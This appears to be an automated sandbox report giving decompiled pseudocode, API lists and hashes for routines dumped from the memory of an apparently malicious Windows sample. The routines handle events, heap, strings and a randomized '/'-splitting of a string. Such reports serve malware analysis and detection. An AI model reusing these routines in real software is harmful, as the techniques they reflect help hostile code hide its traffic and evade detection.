                                                                                                                                                                                                    			E04F64CBE(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                    				signed int* _t39;
                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t36 = __ecx;
                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				_v12 = _a4;
                                                                                                                                                                                                    				_t38 = E04F656DD(__ecx,  &_v32);
                                                                                                                                                                                                    				if(_t38 != 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_t39 = _a8;
                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                    					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                                                                                                                                    						_t16 =  &(_t39[1]); // 0x5
                                                                                                                                                                                                    						_t23 = _t16;
                                                                                                                                                                                                    						if( *_t16 != 0) {
                                                                                                                                                                                                    							E04F64DE0(_t23);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return _t38;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(E04F6576C(0x40,  &_v16) != 0) {
                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t40 = CreateEventA(0x4f6d2a8, 1, 0,  *0x4f6d340);
                                                                                                                                                                                                    				if(_t40 != 0) {
                                                                                                                                                                                                    					SetEvent(_t40);
                                                                                                                                                                                                    					Sleep(0xbb8);
                                                                                                                                                                                                    					CloseHandle(_t40);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push( &_v32);
                                                                                                                                                                                                    				if(_a12 == 0) {
                                                                                                                                                                                                    					_t29 = E04F6215A(_t36);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_t29 = E04F66791(_t36);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t41 = _v16;
                                                                                                                                                                                                    				_t38 = _t29;
                                                                                                                                                                                                    				if(_v16 != 0) {
                                                                                                                                                                                                    					E04F63822(_t41);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t38 != 0) {
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t39 = _a8;
                                                                                                                                                                                                    					_t38 = E04F62997( &_v32, _t39);
                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}












                                                                                                                                                                                                    0x04f64cbe
                                                                                                                                                                                                    0x04f64ccb
                                                                                                                                                                                                    0x04f64cd1
                                                                                                                                                                                                    0x04f64cd2
                                                                                                                                                                                                    0x04f64cd3
                                                                                                                                                                                                    0x04f64cd4
                                                                                                                                                                                                    0x04f64cd5
                                                                                                                                                                                                    0x04f64cd9
                                                                                                                                                                                                    0x04f64ce5
                                                                                                                                                                                                    0x04f64ce9
                                                                                                                                                                                                    0x04f64d71
                                                                                                                                                                                                    0x04f64d71
                                                                                                                                                                                                    0x04f64d74
                                                                                                                                                                                                    0x04f64d76
                                                                                                                                                                                                    0x04f64d7e
                                                                                                                                                                                                    0x04f64d7e
                                                                                                                                                                                                    0x04f64d84
                                                                                                                                                                                                    0x04f64d87
                                                                                                                                                                                                    0x04f64d87
                                                                                                                                                                                                    0x04f64d84
                                                                                                                                                                                                    0x04f64d92
                                                                                                                                                                                                    0x04f64d92
                                                                                                                                                                                                    0x04f64cfc
                                                                                                                                                                                                    0x04f64cfe
                                                                                                                                                                                                    0x04f64cfe
                                                                                                                                                                                                    0x04f64d15
                                                                                                                                                                                                    0x04f64d19
                                                                                                                                                                                                    0x04f64d1c
                                                                                                                                                                                                    0x04f64d27
                                                                                                                                                                                                    0x04f64d2e
                                                                                                                                                                                                    0x04f64d2e
                                                                                                                                                                                                    0x04f64d37
                                                                                                                                                                                                    0x04f64d3b
                                                                                                                                                                                                    0x04f64d49
                                                                                                                                                                                                    0x04f64d3d
                                                                                                                                                                                                    0x04f64d3d
                                                                                                                                                                                                    0x04f64d3e
                                                                                                                                                                                                    0x04f64d3f
                                                                                                                                                                                                    0x04f64d40
                                                                                                                                                                                                    0x04f64d41
                                                                                                                                                                                                    0x04f64d42
                                                                                                                                                                                                    0x04f64d42
                                                                                                                                                                                                    0x04f64d4e
                                                                                                                                                                                                    0x04f64d51
                                                                                                                                                                                                    0x04f64d55
                                                                                                                                                                                                    0x04f64d57
                                                                                                                                                                                                    0x04f64d57
                                                                                                                                                                                                    0x04f64d5e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f64d60
                                                                                                                                                                                                    0x04f64d60
                                                                                                                                                                                                    0x04f64d6d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f64d6d

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateEventA.KERNEL32(04F6D2A8,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,04F628F1,?,00000001,?), ref: 04F64D0F
                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,?,04F628F1,?,00000001,?,00000002,?,?,04F650A1,?), ref: 04F64D1C
                                                                                                                                                                                                    • Sleep.KERNEL32(00000BB8,?,?,?,04F628F1,?,00000001,?,00000002,?,?,04F650A1,?), ref: 04F64D27
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,04F628F1,?,00000001,?,00000002,?,?,04F650A1,?), ref: 04F64D2E
                                                                                                                                                                                                      • Part of subcall function 04F6215A: WaitForSingleObject.KERNEL32(00000000,?,?,?,04F64D4E,?,04F64D4E,?,?,?,?,?,04F64D4E,?), ref: 04F62234
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2559942907-0
                                                                                                                                                                                                    • Opcode ID: 7edceab1e6de9e75160af58f09c640d69e689f9185b38509fb0e79faf57e0829
                                                                                                                                                                                                    • Instruction ID: 267e0e56bcc819e7abbce2946922bb491194291d1ed2ab8b5af1540f0b9a3c7e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7edceab1e6de9e75160af58f09c640d69e689f9185b38509fb0e79faf57e0829
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE215E77D00119FBDF10BFE498849EEB7BCEB44754B054525EA62E7200DB38B9428BA4
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                    			E04F6226B(unsigned int __eax, void* __ecx) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                    				signed short _t23;
                                                                                                                                                                                                    				char* _t27;
                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                    				unsigned int _t33;
                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                    				unsigned int _t38;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                    				int _t45;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t42 = __eax;
                                                                                                                                                                                                    				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                                                                                                                    				_t38 = __eax;
                                                                                                                                                                                                    				_t30 = RtlAllocateHeap( *0x4f6d238, 0, (__eax >> 3) + __eax + 1);
                                                                                                                                                                                                    				_v12 = _t30;
                                                                                                                                                                                                    				if(_t30 != 0) {
                                                                                                                                                                                                    					_v8 = _t42;
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t33 = 0x18;
                                                                                                                                                                                                    						if(_t38 <= _t33) {
                                                                                                                                                                                                    							_t33 = _t38;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t21 =  *0x4f6d250; // 0x92d51dae
                                                                                                                                                                                                    						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                                                                                                                    						 *0x4f6d250 = _t23;
                                                                                                                                                                                                    						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                                                                                                                    						memcpy(_t30, _v8, _t45);
                                                                                                                                                                                                    						_v8 = _v8 + _t45;
                                                                                                                                                                                                    						_t27 = _t30 + _t45;
                                                                                                                                                                                                    						_t38 = _t38 - _t45;
                                                                                                                                                                                                    						_t46 = _t46 + 0xc;
                                                                                                                                                                                                    						 *_t27 = 0x2f;
                                                                                                                                                                                                    						_t13 = _t27 + 1; // 0x1
                                                                                                                                                                                                    						_t30 = _t13;
                                                                                                                                                                                                    					} while (_t38 > 8);
                                                                                                                                                                                                    					memcpy(_t30, _v8, _t38 + 1);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                    			}

















                                                                                                                                                                                                    0x04f62273
                                                                                                                                                                                                    0x04f62276
                                                                                                                                                                                                    0x04f6227c
                                                                                                                                                                                                    0x04f62294
                                                                                                                                                                                                    0x04f62296
                                                                                                                                                                                                    0x04f6229b
                                                                                                                                                                                                    0x04f6229d
                                                                                                                                                                                                    0x04f622a0
                                                                                                                                                                                                    0x04f622a2
                                                                                                                                                                                                    0x04f622a5
                                                                                                                                                                                                    0x04f622a7
                                                                                                                                                                                                    0x04f622a7
                                                                                                                                                                                                    0x04f622a9
                                                                                                                                                                                                    0x04f622b4
                                                                                                                                                                                                    0x04f622b9
                                                                                                                                                                                                    0x04f622ca
                                                                                                                                                                                                    0x04f622d2
                                                                                                                                                                                                    0x04f622d7
                                                                                                                                                                                                    0x04f622da
                                                                                                                                                                                                    0x04f622dd
                                                                                                                                                                                                    0x04f622df
                                                                                                                                                                                                    0x04f622e2
                                                                                                                                                                                                    0x04f622e5
                                                                                                                                                                                                    0x04f622e5
                                                                                                                                                                                                    0x04f622e8
                                                                                                                                                                                                    0x04f622f3
                                                                                                                                                                                                    0x04f622f8
                                                                                                                                                                                                    0x04f62302

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F61AC3,00000000,?,?,04F61EFB,?,059295B0), ref: 04F62276
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F6228E
                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04F61AC3,00000000,?,?,04F61EFB,?,059295B0), ref: 04F622D2
                                                                                                                                                                                                    • memcpy.NTDLL(00000001,?,00000001), ref: 04F622F3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1819133394-0
                                                                                                                                                                                                    • Opcode ID: 1005b2e129e681e37ecc49a0bdaf4eb670b6171a68e4ddc802b6371aebea1b3c
                                                                                                                                                                                                    • Instruction ID: 25c47a69e0b24a4ab38381090e145ea381dd7dc1455a0376a140726e3307e6df
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1005b2e129e681e37ecc49a0bdaf4eb670b6171a68e4ddc802b6371aebea1b3c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE11E972A00159FFE7109FA9EC84E9EBBAEDBC4360B0501B6F505D7150E7749E05D760
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                    			E04F65FC5(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                    				char* _t18;
                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t19 = 0x27;
                                                                                                                                                                                                    				_t1 =  &_v20; // 0x74666f53
                                                                                                                                                                                                    				_t18 = 0;
                                                                                                                                                                                                    				E04F660BE(_t8, _t1);
                                                                                                                                                                                                    				_t16 = E04F68D59(_t19);
                                                                                                                                                                                                    				if(_t16 != 0) {
                                                                                                                                                                                                    					_t3 =  &_v20; // 0x74666f53
                                                                                                                                                                                                    					_t13 = E04F62A8E(_t3, _t16, _a8);
                                                                                                                                                                                                    					if(_a4 != 0) {
                                                                                                                                                                                                    						__imp__(_a4);
                                                                                                                                                                                                    						_t19 = _t13 + 0x27;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t18 = E04F68D59(_t19);
                                                                                                                                                                                                    					if(_t18 != 0) {
                                                                                                                                                                                                    						 *_t18 = 0;
                                                                                                                                                                                                    						if(_a4 != 0) {
                                                                                                                                                                                                    							__imp__(_t18, _a4);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__imp__(_t18, _t16);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					E04F6677C(_t16);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t18;
                                                                                                                                                                                                    			}









                                                                                                                                                                                                    0x04f65fd0
                                                                                                                                                                                                    0x04f65fd1
                                                                                                                                                                                                    0x04f65fd4
                                                                                                                                                                                                    0x04f65fd6
                                                                                                                                                                                                    0x04f65fe1
                                                                                                                                                                                                    0x04f65fe5
                                                                                                                                                                                                    0x04f65fea
                                                                                                                                                                                                    0x04f65fee
                                                                                                                                                                                                    0x04f65ff6
                                                                                                                                                                                                    0x04f65ffb
                                                                                                                                                                                                    0x04f66003
                                                                                                                                                                                                    0x04f66003
                                                                                                                                                                                                    0x04f6600c
                                                                                                                                                                                                    0x04f66010
                                                                                                                                                                                                    0x04f66016
                                                                                                                                                                                                    0x04f66019
                                                                                                                                                                                                    0x04f6601f
                                                                                                                                                                                                    0x04f6601f
                                                                                                                                                                                                    0x04f66027
                                                                                                                                                                                                    0x04f66027
                                                                                                                                                                                                    0x04f6602e
                                                                                                                                                                                                    0x04f6602e
                                                                                                                                                                                                    0x04f66039

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 04F68D59: RtlAllocateHeap.NTDLL(00000000,00000000,04F69099), ref: 04F68D65
                                                                                                                                                                                                      • Part of subcall function 04F62A8E: wsprintfA.USER32 ref: 04F62AEA
                                                                                                                                                                                                    • lstrlen.KERNEL32(04F65073,00000000,00000000,00000027,00000005,00000000,00000000,04F656A8,74666F53,00000000,04F65073,04F6D00C,?,04F65073), ref: 04F65FFB
                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 04F6601F
                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 04F66027
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                                                                                                                                                                    • String ID: Soft
                                                                                                                                                                                                    • API String ID: 393707159-3753413193
                                                                                                                                                                                                    • Opcode ID: 2f09fcc5375d24b70528b18b9c6f70af367e153011802004ea1f12b2e9728d0f
                                                                                                                                                                                                    • Instruction ID: b32299030fd7e38d22aca14fdfb2a597e6fa70f8b3df0c2974180565453ac3f5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f09fcc5375d24b70528b18b9c6f70af367e153011802004ea1f12b2e9728d0f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07012B32500109B7E7223BA5EC88AAF3E6CDF84389F004025F916D5000DB79994787A1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E04F6A457(void* __esi) {
                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v4;
                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v4 = 0;
                                                                                                                                                                                                    				memset(__esi, 0, 0x38);
                                                                                                                                                                                                    				_t8 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                    				 *(__esi + 0x1c) = _t8;
                                                                                                                                                                                                    				if(_t8 != 0) {
                                                                                                                                                                                                    					_t10 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                    					 *(__esi + 0x20) = _t10;
                                                                                                                                                                                                    					if(_t10 == 0) {
                                                                                                                                                                                                    						CloseHandle( *(__esi + 0x1c));
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_v4 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _v4;
                                                                                                                                                                                                    			}






                                                                                                                                                                                                    0x04f6a461
                                                                                                                                                                                                    0x04f6a465
                                                                                                                                                                                                    0x04f6a47a
                                                                                                                                                                                                    0x04f6a47c
                                                                                                                                                                                                    0x04f6a481
                                                                                                                                                                                                    0x04f6a487
                                                                                                                                                                                                    0x04f6a489
                                                                                                                                                                                                    0x04f6a48e
                                                                                                                                                                                                    0x04f6a499
                                                                                                                                                                                                    0x04f6a490
                                                                                                                                                                                                    0x04f6a490
                                                                                                                                                                                                    0x04f6a490
                                                                                                                                                                                                    0x04f6a48e
                                                                                                                                                                                                    0x04f6a4a7

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.NTDLL ref: 04F6A465
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 04F6A47A
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04F6A487
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 04F6A499
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateEvent$CloseHandlememset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2812548120-0
                                                                                                                                                                                                    • Opcode ID: 47aefaf8ddc2f9862eadc4bb48c61476646207b5d7b0acb141716de0784824ad
                                                                                                                                                                                                    • Instruction ID: 62328a34d5bd97f8112f87ac007e112067dfe521f30ae82709e27018bf64ece7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47aefaf8ddc2f9862eadc4bb48c61476646207b5d7b0acb141716de0784824ad
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4F0FEB150530CBFD3106F66ECC4C27FBACEB46298B11892EF58792511D675A8198A70
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E04F620BE() {
                                                                                                                                                                                                    				void* _t1;
                                                                                                                                                                                                    				intOrPtr _t5;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t1 =  *0x4f6d26c; // 0x374
                                                                                                                                                                                                    				if(_t1 == 0) {
                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				SetEvent(_t1);
                                                                                                                                                                                                    				_t11 = 0x7fffffff;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					SleepEx(0x64, 1);
                                                                                                                                                                                                    					_t5 =  *0x4f6d2b8; // 0x0
                                                                                                                                                                                                    					if(_t5 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t11 = _t11 - 0x64;
                                                                                                                                                                                                    					if(_t11 > 0) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					break;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t6 =  *0x4f6d26c; // 0x374
                                                                                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                                                                                    					CloseHandle(_t6);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t7 =  *0x4f6d238; // 0x5530000
                                                                                                                                                                                                    				if(_t7 != 0) {
                                                                                                                                                                                                    					HeapDestroy(_t7);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x04f620be
                                                                                                                                                                                                    0x04f620c5
                                                                                                                                                                                                    0x04f6210f
                                                                                                                                                                                                    0x04f62111
                                                                                                                                                                                                    0x04f62111
                                                                                                                                                                                                    0x04f620c9
                                                                                                                                                                                                    0x04f620cf
                                                                                                                                                                                                    0x04f620d4
                                                                                                                                                                                                    0x04f620d8
                                                                                                                                                                                                    0x04f620de
                                                                                                                                                                                                    0x04f620e5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f620e7
                                                                                                                                                                                                    0x04f620ec
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f620ec
                                                                                                                                                                                                    0x04f620ee
                                                                                                                                                                                                    0x04f620f6
                                                                                                                                                                                                    0x04f620f9
                                                                                                                                                                                                    0x04f620f9
                                                                                                                                                                                                    0x04f620ff
                                                                                                                                                                                                    0x04f62106
                                                                                                                                                                                                    0x04f62109
                                                                                                                                                                                                    0x04f62109
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetEvent.KERNEL32(00000374,00000001,04F691D0), ref: 04F620C9
                                                                                                                                                                                                    • SleepEx.KERNEL32(00000064,00000001), ref: 04F620D8
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000374), ref: 04F620F9
                                                                                                                                                                                                    • HeapDestroy.KERNEL32(05530000), ref: 04F62109
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4109453060-0
                                                                                                                                                                                                    • Opcode ID: d91450796441576faf1d6794bde37e05059459ea74475fb81a5f119f280a2ae4
                                                                                                                                                                                                    • Instruction ID: 0d3627d2cd8a9004499df408063cbbef1bfcf8ff459a1082ca0aa56a8442c9c9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d91450796441576faf1d6794bde37e05059459ea74475fb81a5f119f280a2ae4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28F03031B05359F7EB20BB75B848A027B98EB04B517064650FDA6D7288CF38EC41EA60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                    			E04F6972C(void** __esi) {
                                                                                                                                                                                                    				char* _v0;
                                                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                    				intOrPtr _t11;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				void** _t14;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t14 = __esi;
                                                                                                                                                                                                    				_t4 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    				__imp__(_t4 + 0x40);
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t6 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    					_t1 = _t6 + 0x58; // 0x0
                                                                                                                                                                                                    					if( *_t1 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					Sleep(0xa);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t8 =  *_t14;
                                                                                                                                                                                                    				if(_t8 != 0 && _t8 != 0x4f6d030) {
                                                                                                                                                                                                    					HeapFree( *0x4f6d238, 0, _t8);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t14[1] = E04F6203C(_v0, _t14);
                                                                                                                                                                                                    				_t11 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    				_t12 = _t11 + 0x40;
                                                                                                                                                                                                    				__imp__(_t12);
                                                                                                                                                                                                    				return _t12;
                                                                                                                                                                                                    			}










                                                                                                                                                                                                    0x04f6972c
                                                                                                                                                                                                    0x04f6972c
                                                                                                                                                                                                    0x04f69735
                                                                                                                                                                                                    0x04f69745
                                                                                                                                                                                                    0x04f69745
                                                                                                                                                                                                    0x04f6974a
                                                                                                                                                                                                    0x04f6974f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6973f
                                                                                                                                                                                                    0x04f6973f
                                                                                                                                                                                                    0x04f69751
                                                                                                                                                                                                    0x04f69755
                                                                                                                                                                                                    0x04f69767
                                                                                                                                                                                                    0x04f69767
                                                                                                                                                                                                    0x04f69777
                                                                                                                                                                                                    0x04f6977a
                                                                                                                                                                                                    0x04f6977f
                                                                                                                                                                                                    0x04f69783
                                                                                                                                                                                                    0x04f69789

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(05929570), ref: 04F69735
                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,04F65068), ref: 04F6973F
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,04F65068), ref: 04F69767
                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(05929570), ref: 04F69783
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
